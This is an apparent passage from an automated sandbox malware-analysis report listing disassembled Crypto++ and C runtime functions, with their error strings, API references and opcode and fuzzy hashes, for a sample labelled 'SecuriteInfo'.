                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _malloc$ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: doesn't match the required length of $ for this key$: ciphertext length of
                                                                                          • API String ID: 1025790555-2559040249
                                                                                          • Opcode ID: 0e80a22668a13a4389766e0001764911613ea2dbf032fba65274194152976403
                                                                                          • Instruction ID: b88997801ed7dbfc38c5329d42e01610d1dd274d7dfdf58f2f5616187d00bed0
                                                                                          • Opcode Fuzzy Hash: 0e80a22668a13a4389766e0001764911613ea2dbf032fba65274194152976403
                                                                                          • Instruction Fuzzy Hash: 4BA14D7550C380AFE324CB69D880F9BB7E9AFD9304F458A1DE59D83251DB70A905CBA3
                                                                                          Function 6D06B47D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 6D06B50D
                                                                                            • Part of subcall function 6D071AA0: __87except.LIBCMT ref: 6D071ADB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorHandling__87except__start
                                                                                          • String ID: pow
                                                                                          • API String ID: 2905807303-2276729525
                                                                                          • Opcode ID: 8a92beed18226ea9d5ad450ae936a4afd600d770d3fbfb660803b8b70222462a
                                                                                          • Instruction ID: 3374429c10a42f5892e90e8da3cdbd1d0c485bc6f7603434a813450da78d0671
                                                                                          • Opcode Fuzzy Hash: 8a92beed18226ea9d5ad450ae936a4afd600d770d3fbfb660803b8b70222462a
                                                                                          • Instruction Fuzzy Hash: 6F518DA1E1C24396FB11AB18C9603BE7BF4EB42711F50DD59F5E44A1D4FF3484848A6B
                                                                                          Function 6D018560 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 179COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __cftoe.LIBCMT ref: 6D0188ED
                                                                                            • Part of subcall function 6D06A116: __mbstowcs_s_l.LIBCMT ref: 6D06A12C
                                                                                          • __cftoe.LIBCMT ref: 6D018911
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: __cftoe$__mbstowcs_s_l
                                                                                          • String ID: zX$P
                                                                                          • API String ID: 1494777130-2079734279
                                                                                          • Opcode ID: 97d72a63bf5dd27a5ae1ae3606755740fb4cd82e2087e67adae4e59220786e34
                                                                                          • Instruction ID: 7b0b64fd70a955047ae93eca95a1159e4126ab2e13f849ff81dfdd22a0c3f694
                                                                                          • Opcode Fuzzy Hash: 97d72a63bf5dd27a5ae1ae3606755740fb4cd82e2087e67adae4e59220786e34
                                                                                          • Instruction Fuzzy Hash: 75910FB110C7819FD376CF14C890BABBBE8BB88714F508A1DE19D4B281EB716645CF92
                                                                                          Function 6D0389D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D038ABB
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D038B82
                                                                                          Strings
                                                                                          • : invalid ciphertext, xrefs: 6D038B48
                                                                                          • PK_DefaultDecryptionFilter: ciphertext too long, xrefs: 6D038A8E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw
                                                                                          • String ID: : invalid ciphertext$PK_DefaultDecryptionFilter: ciphertext too long
                                                                                          • API String ID: 2005118841-483996327
                                                                                          • Opcode ID: 651456a941b6597234e51ca7ab8160ba00d3da3e8623b4c8f601afa8a6400bf7
                                                                                          • Instruction ID: 16f3582c1cd33899abcf2ca11f80c11446121d56c8e588e451787846f16af7bf
                                                                                          • Opcode Fuzzy Hash: 651456a941b6597234e51ca7ab8160ba00d3da3e8623b4c8f601afa8a6400bf7
                                                                                          • Instruction Fuzzy Hash: 4D515EB5108781AFE324CF54D990FABB7F8EF88704F014A5DE59A87641DB31E908CB62
                                                                                          Function 6D036B00 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D036BA6
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D004010: _memmove.LIBCMT ref: 6D0040C8
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D036C56
                                                                                          Strings
                                                                                          • NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes, xrefs: 6D036B33
                                                                                          • RandomNumberGenerator: IncorporateEntropy not implemented, xrefs: 6D036BE3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                          • String ID: NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes$RandomNumberGenerator: IncorporateEntropy not implemented
                                                                                          • API String ID: 1902190269-184618050
                                                                                          • Opcode ID: 7df33e4a9fd4535bf9099938afe89e1acd133083e13dac092db27e1ff9ca1888
                                                                                          • Instruction ID: 3f37eb0630924384616229c557f642a63d4158d2b796254d3c498b5c78403bce
                                                                                          • Opcode Fuzzy Hash: 7df33e4a9fd4535bf9099938afe89e1acd133083e13dac092db27e1ff9ca1888
                                                                                          • Instruction Fuzzy Hash: 8F5112B110C780AFE300DF69C880B5BFBE8BB99754F504A2EF19997291D7B4D908CB56
                                                                                          Function 6D004E80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004EFC
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D004F16
                                                                                          • _memmove.LIBCMT ref: 6D004F6C
                                                                                            • Part of subcall function 6D004D90: std::_Xinvalid_argument.LIBCPMT ref: 6D004DA9
                                                                                            • Part of subcall function 6D004D90: std::_Xinvalid_argument.LIBCPMT ref: 6D004DCA
                                                                                            • Part of subcall function 6D004D90: std::_Xinvalid_argument.LIBCPMT ref: 6D004DE5
                                                                                            • Part of subcall function 6D004D90: _memmove.LIBCMT ref: 6D004E4D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                          • String ID: string too long
                                                                                          • API String ID: 2168136238-2556327735
                                                                                          • Opcode ID: bc5821ae5335aa1cee2bc9452ff4d02ccc701781701bcd7dc3f79000ea124cdc
                                                                                          • Instruction ID: 3791d1e0adc7ddd369f53f51fe6b16e4f2bdaf0aa1ef0e15aeb6f59127be9931
                                                                                          • Opcode Fuzzy Hash: bc5821ae5335aa1cee2bc9452ff4d02ccc701781701bcd7dc3f79000ea124cdc
                                                                                          • Instruction Fuzzy Hash: A93104323106507BF7249E5DA480B7EF7EAEFED620B60492FE25587681C771D84483A9
                                                                                          Function 6D002090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D00211F
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D004010: _memmove.LIBCMT ref: 6D0040C8
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D0021BF
                                                                                          Strings
                                                                                          • PK_MessageAccumulator: TruncatedFinal() should not be called, xrefs: 6D00215D
                                                                                          • PK_MessageAccumulator: DigestSize() should not be called, xrefs: 6D0020BD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                          • String ID: PK_MessageAccumulator: DigestSize() should not be called$PK_MessageAccumulator: TruncatedFinal() should not be called
                                                                                          • API String ID: 1902190269-1268710280
                                                                                          • Opcode ID: ebf60bf7f475550ea3fec91237287ca06b21562e40a35f876113243adab05431
                                                                                          • Instruction ID: 839b8e012151600d655d7faca6735558a23074abd9140c81df7942ea0e437518
                                                                                          • Opcode Fuzzy Hash: ebf60bf7f475550ea3fec91237287ca06b21562e40a35f876113243adab05431
                                                                                          • Instruction Fuzzy Hash: 9D413C70C0828CBFEB00DFE9D890BEDFBB8EB19314F504259E521A7691DB745608CB61
                                                                                          Function 6D001D30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 113COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D001DC9
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D004067
                                                                                            • Part of subcall function 6D004010: _memmove.LIBCMT ref: 6D0040C8
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D001E74
                                                                                          Strings
                                                                                          • BufferedTransformation: this object is not attachable, xrefs: 6D001D67
                                                                                          • CryptoMaterial: this object contains invalid values, xrefs: 6D001E16
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8ThrowXinvalid_argumentstd::_$ExceptionRaise_memmove
                                                                                          • String ID: BufferedTransformation: this object is not attachable$CryptoMaterial: this object contains invalid values
                                                                                          • API String ID: 1902190269-3853263434
                                                                                          • Opcode ID: e25171b55ae29d3bcd4890869e30c1bd4dbf9022ee1cc036116989381614b0fe
                                                                                          • Instruction ID: b527d6d546d35cecfe6d964a9c64287f9d6547757139cc603346ab985d907c95
                                                                                          • Opcode Fuzzy Hash: e25171b55ae29d3bcd4890869e30c1bd4dbf9022ee1cc036116989381614b0fe
                                                                                          • Instruction Fuzzy Hash: B5414E70C04288BFEB00DFE8D880BDEFBB8EF19314F10826AE52567691DB745604CB50
                                                                                          Function 6D0374C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 95COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D05D820: _memmove.LIBCMT ref: 6D05D930
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D03761A
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
                                                                                          • String ID: byte digest to $ bytes$HashTransformation: can't truncate a
                                                                                          • API String ID: 39012651-1139078987
                                                                                          • Opcode ID: 30c6fd3bfbdeec7b5aeab28a4f029c58454467e001b6623ee1f0c78b236c76f8
                                                                                          • Instruction ID: d88a6462e573285a8716cf01eadaed2bf28fc1a57e8e64dba853843f4f362c4d
                                                                                          • Opcode Fuzzy Hash: 30c6fd3bfbdeec7b5aeab28a4f029c58454467e001b6623ee1f0c78b236c76f8
                                                                                          • Instruction Fuzzy Hash: 0741707110C3C1AEE330CB54C844FDFBBE8ABD9314F154A1DE69997281EB7491048BA7
                                                                                          Function 6D03BEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 6D03BF2D
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D0690ED
                                                                                            • Part of subcall function 6D0690D8: __CxxThrowException@8.LIBCMT ref: 6D069102
                                                                                            • Part of subcall function 6D0690D8: std::exception::exception.LIBCMT ref: 6D069113
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                          • String ID: gfff$gfff$vector<T> too long
                                                                                          • API String ID: 1823113695-3369487235
                                                                                          • Opcode ID: f73ba57d022e67f10c9961fafd6fd68c33c0d571777b275239830134871fb9d5
                                                                                          • Instruction ID: 160aa790a0c0d6264700de2808fc87920ad5039cc9cc3373279da779a7a3ef3d
                                                                                          • Opcode Fuzzy Hash: f73ba57d022e67f10c9961fafd6fd68c33c0d571777b275239830134871fb9d5
                                                                                          • Instruction Fuzzy Hash: 8431B6B1A0460A9FD718CF5AD980F6AF7E9EB88304F15862DE9599B780D730B9048B91
                                                                                          Function 6D068F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • QueryPerformanceCounter.KERNEL32(4E8A916F,4E8A916F,?,00000000), ref: 6D068F7F
                                                                                          • GetLastError.KERNEL32(0000000A,?,00000000), ref: 6D068F8F
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D069014
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          • Timer: QueryPerformanceCounter failed with error , xrefs: 6D068FA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
                                                                                          • String ID: Timer: QueryPerformanceCounter failed with error
                                                                                          • API String ID: 1823523280-4075696077
                                                                                          • Opcode ID: 9f6b2218d96fcc0c4299ad1522222a44488dfc605b87257ca2cbb2f33f4266a5
                                                                                          • Instruction ID: f24dc8b368c5dc5bdb3df437cd7bee1606701ef4d74209ed30e83ad1556a08b2
                                                                                          • Opcode Fuzzy Hash: 9f6b2218d96fcc0c4299ad1522222a44488dfc605b87257ca2cbb2f33f4266a5
                                                                                          • Instruction Fuzzy Hash: 1C210AB250C780AFE310DF24D844B9BBBE8FB89614F504A1DF5A997281D775D5048BA3
                                                                                          Function 6D068E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • QueryPerformanceFrequency.KERNEL32(4E8A916F,4E8A916F), ref: 6D068E7F
                                                                                          • GetLastError.KERNEL32(0000000A), ref: 6D068E8F
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D068F14
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          • Timer: QueryPerformanceFrequency failed with error , xrefs: 6D068EA5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
